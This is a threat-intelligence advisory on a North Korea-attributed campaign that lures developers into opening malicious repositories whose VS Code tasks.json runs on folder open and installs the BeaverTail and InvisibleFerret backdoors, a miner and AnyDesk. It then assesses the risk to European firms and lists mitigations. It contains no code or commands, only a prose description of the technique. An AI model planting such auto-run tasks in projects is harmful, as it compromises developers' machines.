The Contagious Interview campaign, attributed to North Korean state-sponsored actors, has evolved to exploit Microsoft Visual Studio Code's task configuration feature to deliver backdoors and malware to developers. The attack begins when a target is socially engineered to clone a malicious repository from platforms like GitHub, GitLab, or Bitbucket and open it in VS Code, often under the guise of a job assessment. Upon opening, if the user trusts the repository author, VS Code automatically executes commands defined in the tasks.json file with the "runOn: folderOpen" option, enabling the execution of arbitrary code without further user interaction. This code fetches obfuscated JavaScript payloads hosted on Vercel domains, which establish persistent backdoors named BeaverTail (Node.js based) and InvisibleFerret (Python based). These backdoors provide remote code execution, system fingerprinting, and continuous communication with command and control servers. The malware also includes modules for keylogging, screenshot capture, clipboard manipulation to substitute cryptocurrency wallet addresses, and exfiltration of sensitive files. Additionally, the campaign deploys an XMRig cryptocurrency miner and installs AnyDesk for remote access. The attackers employ fallback mechanisms such as malicious npm packages and multi-stage droppers disguised as spell-check dictionaries to ensure payload delivery even if initial methods fail. The campaign targets developers, especially those in cryptocurrency, blockchain, and fintech sectors, aiming to steal intellectual property, gain unauthorized access to internal systems, and siphon digital assets. The use of legitimate developer tools and workflows to deliver malware demonstrates a sophisticated approach to evade detection and increase infection success rates. The campaign’s evolution reflects the DPRK actors’ intent to enhance cyber espionage and financial theft capabilities to support their regime under heavy sanctions.

European organizations, particularly those with active software development teams in fintech, blockchain, and cryptocurrency sectors, face significant risks from this campaign. Compromise of developer machines can lead to theft of intellectual property, source code, and sensitive internal data, undermining competitive advantage and regulatory compliance. Unauthorized remote code execution on developer endpoints can facilitate lateral movement within networks, potentially exposing critical infrastructure and financial systems. The deployment of cryptocurrency miners can degrade system performance and increase operational costs. The use of remote access tools like AnyDesk further escalates the risk of persistent unauthorized access and data exfiltration. Given the targeting of developers, supply chain risks increase as compromised code or credentials may propagate malware or backdoors into production environments. The campaign’s stealthy use of legitimate tools complicates detection and response, increasing potential dwell time and damage. European organizations may also face reputational damage and regulatory penalties if breaches lead to exposure of personal or financial data. The campaign’s focus on cryptocurrency and fintech sectors aligns with Europe’s growing digital finance markets, amplifying potential financial losses and strategic impacts.

1. Enforce strict policies on trusting VS Code repositories, including user education to avoid blindly trusting unknown or unsolicited repositories, especially those received via social engineering. 2. Disable or restrict automatic execution of VS Code task configurations (tasks.json) in enterprise environments or require explicit user approval with enhanced warnings. 3. Implement endpoint detection and response (EDR) solutions capable of monitoring and alerting on suspicious VS Code task executions, Node.js runtime invocations, and unusual network connections to domains like Vercel. 4. Use network security controls to block or monitor traffic to suspicious or untrusted hosting platforms and domains known to be used by threat actors. 5. Conduct regular audits of developer machines for unauthorized npm packages or unusual Python environments indicative of malware. 6. Employ multi-factor authentication and least privilege principles for developer accounts to limit lateral movement if a compromise occurs. 7. Integrate software supply chain security practices, including code signing, repository scanning, and dependency vetting, to detect and prevent malicious code inclusion. 8. Monitor clipboard activity and system processes for signs of wallet address substitution or keylogging. 9. Establish incident response playbooks specifically addressing developer environment compromises and supply chain attacks. 10. Collaborate with threat intelligence providers to stay updated on evolving tactics and indicators of compromise related to this campaign.